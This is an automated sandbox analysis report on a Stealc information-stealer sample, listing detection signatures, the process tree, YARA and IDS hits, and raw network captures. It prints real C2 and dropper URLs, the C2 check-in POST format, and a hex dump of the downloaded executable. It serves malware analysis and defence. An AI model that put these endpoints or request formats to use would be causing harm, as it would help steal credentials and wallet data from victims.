
Windows Analysis Report
mCe4hBfqCT.exe

Overview

General Information

Sample name: mCe4hBfqCT.exe (renamed because the original name is a hash value)
Original sample name: 5b01b239f2b48841380e3665d1c3f98a.exe
Analysis ID: 1542736
MD5: 5b01b239f2b48841380e3665d1c3f98a
SHA1: ae35e49abca5950c5be20ef121ee8d74a903b877
SHA256: 8c32b0c595db81613c72044bb9d2d3d8170916760d30b7bf0c9710da462a2bb2
Tags: exe, Stealc, user-abuse_ch

Detection

Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Machine Learning detection for dropped file
Machine Learning detection for sample
Searches for specific processes (likely to inject)
AV process strings found (often used to terminate AV products)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evaded block containing many API calls
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • mCe4hBfqCT.exe (PID: 4672 cmdline: "C:\Users\user\Desktop\mCe4hBfqCT.exe" MD5: 5B01B239F2B48841380E3665D1C3F98A)
    • 64A.tmp.exe (PID: 5576 cmdline: "C:\Users\user\AppData\Local\Temp\64A.tmp.exe" MD5: 676EE4608A4ABD53EBDD6B380C2A3817)
      • WerFault.exe (PID: 1412 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5576 -s 1044 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
Name | Description | Attribution | Blogpost URLs | Link
Stealc | Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development draws on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, browser extensions and desktop cryptocurrency wallet applications, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests. | No Attribution | | https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
{"C2 url": "http://62.204.41.177/edd20096ecef326d.php", "Botnet": "default9_cap"}
Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_Stealc_1 | Yara detected Stealc | Joe Security |

Source | Rule | Description | Author | Strings
00000000.00000002.4504249917.0000000002D29000.00000040.00000020.00020000.00000000.sdmp | Windows_Trojan_RedLineStealer_ed346e4c | unknown | unknown | 0x1240:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000002.00000003.2179254036.0000000004820000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
00000002.00000002.2422568211.0000000002D19000.00000040.00000020.00020000.00000000.sdmp | Windows_Trojan_RedLineStealer_ed346e4c | unknown | unknown | 0xd48:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000002.00000002.2422589956.0000000002D43000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp | Windows_Trojan_Smokeloader_3687686f | unknown | unknown | 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
(5 further entries not included in this export)

Source | Rule | Description | Author | Strings
2.2.64A.tmp.exe.2f00e67.3.unpack | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
2.2.64A.tmp.exe.400000.1.raw.unpack | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
2.2.64A.tmp.exe.2f00e67.3.raw.unpack | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
2.2.64A.tmp.exe.400000.1.unpack | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
2.3.64A.tmp.exe.4820000.0.raw.unpack | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
(1 further entry not included in this export)

No Sigma rule has matched

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-26T08:56:18.476436+0200 | 2044243 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49706 | 62.204.41.177 | 80 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-26T08:56:07.383952+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49704 | 104.21.56.70 | 443 | TCP
2024-10-26T08:56:08.479342+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49705 | 176.113.115.37 | 80 | TCP

AV Detection
Source: mCe4hBfqCT.exe | Avira: detected
Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exe | Avira: detection malicious, Label: HEUR/AGEN.1312567
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\ScreenUpdateSync[1].exe | Avira: detection malicious, Label: HEUR/AGEN.1312567
Source: 00000002.00000003.2179254036.0000000004820000.00000004.00001000.00020000.00000000.sdmp | Malware Configuration Extractor: StealC {"C2 url": "http://62.204.41.177/edd20096ecef326d.php", "Botnet": "default9_cap"}
Source: http://62.204.41.177/edd20096ecef326d.php | Virustotal: Detection: 17%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\ScreenUpdateSync[1].exe | ReversingLabs: Detection: 44%
Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exe | ReversingLabs: Detection: 44%
Source: mCe4hBfqCT.exe | ReversingLabs: Detection: 39%
Source: mCe4hBfqCT.exe | Virustotal: Detection: 41%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\ScreenUpdateSync[1].exe | Joe Sandbox ML: detected
Source: mCe4hBfqCT.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exe | Code function: 2_2_0040C820 memset,lstrlenA,CryptStringToBinaryA,memcpy,lstrcatA,lstrcatA,lstrcatA | 2_2_0040C820
Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exe | Code function: 2_2_00407240 GetProcessHeap,HeapAlloc,CryptUnprotectData,WideCharToMultiByte,LocalFree | 2_2_00407240
Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exe | Code function: 2_2_00409AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree | 2_2_00409AC0
Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exe | Code function: 2_2_00418EA0 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA | 2_2_00418EA0
Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exe | Code function: 2_2_00409B60 CryptUnprotectData,LocalAlloc,memcpy,LocalFree | 2_2_00409B60
Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exe | Code function: 2_2_02F0CA87 memset,lstrlen,CryptStringToBinaryA,memcpy,lstrcat,lstrcat,lstrcat | 2_2_02F0CA87
Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exe | Code function: 2_2_02F074A7 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree | 2_2_02F074A7
Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exe | Code function: 2_2_02F09DC7 CryptUnprotectData,LocalAlloc,memcpy,LocalFree | 2_2_02F09DC7
Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exe | Code function: 2_2_02F09D27 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree | 2_2_02F09D27
Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exe | Code function: 2_2_02F19107 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA | 2_2_02F19107

Compliance
Source: C:\Users\user\Desktop\mCe4hBfqCT.exe | Unpacked PE file: 0.2.mCe4hBfqCT.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exe | Unpacked PE file: 2.2.64A.tmp.exe.400000.1.unpack
Source: mCe4hBfqCT.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\mCe4hBfqCT.exe | File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: unknown | HTTPS traffic detected: 104.21.56.70:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: C:\Users\user\Desktop\mCe4hBfqCT.exe | Code function: 0_2_00438A12 FindFirstFileExW | 0_2_00438A12
Source: C:\Users\user\Desktop\mCe4hBfqCT.exe | Code function: 0_2_03048C79 FindFirstFileExW | 0_2_03048C79
Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exe | Code function: 2_2_0040E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA | 2_2_0040E430
Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exe | Code function: 2_2_004138B0 wsprintfA,FindFirstFileA,lstrcatA,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcatA,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose | 2_2_004138B0
Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exe | Code function: 2_2_00414570 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA | 2_2_00414570
Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exe | Code function: 2_2_00414910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 2_2_00414910
Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exe | Code function: 2_2_0040ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose | 2_2_0040ED20
Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exe | Code function: 2_2_0040BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose | 2_2_0040BE70
Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exe | Code function: 2_2_0040DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 2_2_0040DE10
Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exe | Code function: 2_2_004016D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 2_2_004016D0
Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exe | Code function: 2_2_0040DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose | 2_2_0040DA80
Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exe | Code function: 2_2_00413EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose | 2_2_00413EA0
Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exe | Code function: 2_2_0040F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 2_2_0040F6B0
Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exe | Code function: 2_2_02F0E697 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA | 2_2_02F0E697
Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exe | Code function: 2_2_02F147D7 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen | 2_2_02F147D7
Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exe | Code function: 2_2_02F0EF87 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose | 2_2_02F0EF87
Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exe | Code function: 2_2_02F14B77 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 2_2_02F14B77
Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exe | Code function: 2_2_02F13B17 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose | 2_2_02F13B17
Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exe | Code function: 2_2_02F0F8F1 FindFirstFileA | 2_2_02F0F8F1
Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exe | Code function: 2_2_02F0DCE7 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose | 2_2_02F0DCE7
Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exe | Code function: 2_2_02F0C0D7 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose | 2_2_02F0C0D7
Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exe | Code function: 2_2_02F0E077 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 2_2_02F0E077
Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exe | Code function: 2_2_02F01937 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 2_2_02F01937
Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exe | Code function: 2_2_02F0F917 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 2_2_02F0F917
Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exe | Code function: 2_2_02F14107 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose | 2_2_02F14107

Networking
Source: Network traffic | Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49706 -> 62.204.41.177:80
Source: Malware configuration extractor | URLs: http://62.204.41.177/edd20096ecef326d.php
                  Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 26 Oct 2024 06:56:08 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Sat, 26 Oct 2024 06:45:02 GMTETag: "56000-6255b9332d227"Accept-Ranges: bytesContent-Length: 352256Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 f9 56 c7 b3 bd 37 a9 e0 bd 37 a9 e0 bd 37 a9 e0 00 78 3f e0 bc 37 a9 e0 a3 65 2d e0 a1 37 a9 e0 a3 65 3c e0 ac 37 a9 e0 a3 65 2a e0 e0 37 a9 e0 9a f1 d2 e0 b8 37 a9 e0 bd 37 a8 e0 c4 37 a9 e0 a3 65 23 e0 bc 37 a9 e0 a3 65 3d e0 bc 37 a9 e0 a3 65 38 e0 bc 37 a9 e0 52 69 63 68 bd 37 a9 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 12 12 b8 65 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 70 03 00 00 44 72 02 00 00 00 00 1f 17 00 00 00 10 00 00 00 80 03 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 a0 75 02 00 04 00 00 4d bf 05 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 ac 98 03 00 3c 00 00 00 00 20 74 02 38 7b 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 03 00 a8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 70 6f 03 00 00 10 00 00 00 70 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 50 22 00 00 00 80 03 00 00 24 00 00 00 74 03 00 00 00 00 00 00 00 00 00 00 00 00 00 
40 00 00 40 2e 64 61 74 61 00 00 00 7c 10 70 02 00 b0 03 00 00 14 00 00 00 98 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 75 68 69 00 00 00 00 44 00 00 00 d0 73 02 00 38 00 00 00 ac 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 38 7b 01 00 00 20 74 02 00 7c 01 00 00 e4 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1Host: 62.204.41.177Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /edd20096ecef326d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----ECGDHDHJEBGHJKFIECBGHost: 62.204.41.177Content-Length: 218Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 43 47 44 48 44 48 4a 45 42 47 48 4a 4b 46 49 45 43 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 45 46 42 45 43 44 45 31 32 33 39 37 38 36 32 35 34 35 31 33 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 44 48 44 48 4a 45 42 47 48 4a 4b 46 49 45 43 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 39 5f 63 61 70 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 44 48 44 48 4a 45 42 47 48 4a 4b 46 49 45 43 42 47 2d 2d 0d 0a Data Ascii: ------ECGDHDHJEBGHJKFIECBGContent-Disposition: form-data; name="hwid"0EFBECDE1239786254513------ECGDHDHJEBGHJKFIECBGContent-Disposition: form-data; name="build"default9_cap------ECGDHDHJEBGHJKFIECBG--
Source: Joe Sandbox View | IP Address: 176.113.115.37 | 176.113.115.37
Source: Joe Sandbox View | IP Address: 62.204.41.177 | 62.204.41.177
Source: Joe Sandbox View | ASN Name: TNNET-ASTNNetOyMainnetworkFI | TNNET-ASTNNetOyMainnetworkFI
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49705 -> 176.113.115.37:80
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49704 -> 104.21.56.70:443
Source: unknown | TCP traffic detected without corresponding DNS query: 176.113.115.37 (50 identical entries)
Source: C:\Users\user\Desktop\mCe4hBfqCT.exe | Code function: 0_2_00402A14 InternetOpenW,InternetOpenUrlW,GetTempPathW,GetTempFileNameW,CreateFileW,InternetReadFile,WriteFile,CloseHandle,CloseHandle,ShellExecuteExW,WaitForSingleObject,CloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle | 0_2_00402A14
Source: global traffic | HTTP traffic detected: GET /track_prt.php?sub=0&cc=DE HTTP/1.1User-Agent: ShareScreenHost: post-to-me.com
Source: global traffic | HTTP traffic detected: GET /ScreenUpdateSync.exe HTTP/1.1User-Agent: ShareScreenHost: 176.113.115.37
Source: global traffic | DNS traffic detected: DNS query: post-to-me.com
                  Source: unknownHTTP traffic detected: POST /edd20096ecef326d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----ECGDHDHJEBGHJKFIECBGHost: 62.204.41.177Content-Length: 218Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 43 47 44 48 44 48 4a 45 42 47 48 4a 4b 46 49 45 43 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 45 46 42 45 43 44 45 31 32 33 39 37 38 36 32 35 34 35 31 33 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 44 48 44 48 4a 45 42 47 48 4a 4b 46 49 45 43 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 39 5f 63 61 70 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 44 48 44 48 4a 45 42 47 48 4a 4b 46 49 45 43 42 47 2d 2d 0d 0a Data Ascii: ------ECGDHDHJEBGHJKFIECBGContent-Disposition: form-data; name="hwid"0EFBECDE1239786254513------ECGDHDHJEBGHJKFIECBGContent-Disposition: form-data; name="build"default9_cap------ECGDHDHJEBGHJKFIECBG--
Source: mCe4hBfqCT.exe, mCe4hBfqCT.exe, 00000000.00000002.4504279710.0000000002D9B000.00000004.00000020.00020000.00000000.sdmp, mCe4hBfqCT.exe, 00000000.00000003.4371587584.0000000002DC9000.00000004.00000020.00020000.00000000.sdmp, mCe4hBfqCT.exe, 00000000.00000002.4504361306.0000000002DCA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://176.113.115.37/ScreenUpdateSync.exe
Source: mCe4hBfqCT.exe, 00000000.00000002.4504279710.0000000002D9B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://176.113.115.37/ScreenUpdateSync.exe)
Source: mCe4hBfqCT.exe, 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: http://176.113.115.37/ScreenUpdateSync.exe48rt8k8rt4rwe5rbSOFTWARE
Source: mCe4hBfqCT.exe, 00000000.00000003.4371587584.0000000002DC9000.00000004.00000020.00020000.00000000.sdmp, mCe4hBfqCT.exe, 00000000.00000002.4504361306.0000000002DCA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://176.113.115.37/ScreenUpdateSync.exeY
Source: 64A.tmp.exe, 00000002.00000002.2422589956.0000000002D43000.00000004.00000020.00020000.00000000.sdmp, 64A.tmp.exe, 00000002.00000002.2422523199.0000000002D0E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://62.204.41.177
Source: 64A.tmp.exe, 00000002.00000002.2422589956.0000000002D7C000.00000004.00000020.00020000.00000000.sdmp, 64A.tmp.exe, 00000002.00000002.2422589956.0000000002D43000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://62.204.41.177/
Source: 64A.tmp.exe, 00000002.00000002.2422589956.0000000002D7C000.00000004.00000020.00020000.00000000.sdmp, 64A.tmp.exe, 00000002.00000002.2422589956.0000000002D9B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://62.204.41.177/edd20096ecef326d.php
Source: 64A.tmp.exe, 00000002.00000002.2422589956.0000000002D7C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://62.204.41.177/edd20096ecef326d.php1nZ
Source: 64A.tmp.exe, 00000002.00000002.2422589956.0000000002D7C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://62.204.41.177/edd20096ecef326d.phpfj
Source: 64A.tmp.exe, 00000002.00000002.2422589956.0000000002D7C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://62.204.41.177/edd20096ecef326d.phpunf
Source: 64A.tmp.exe, 00000002.00000002.2422523199.0000000002D0E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://62.204.41.177sLA
Source: Amcache.hve.6.dr | String found in binary or memory: http://upx.sf.net
Source: mCe4hBfqCT.exe, 00000000.00000002.4504279710.0000000002D9B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://post-to-me.com/
Source: mCe4hBfqCT.exe, 00000000.00000002.4504279710.0000000002D9B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://post-to-me.com/6
Source: mCe4hBfqCT.exe | String found in binary or memory: https://post-to-me.com/track_prt.php?sub=
Source: mCe4hBfqCT.exe, 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: https://post-to-me.com/track_prt.php?sub=&cc=DE
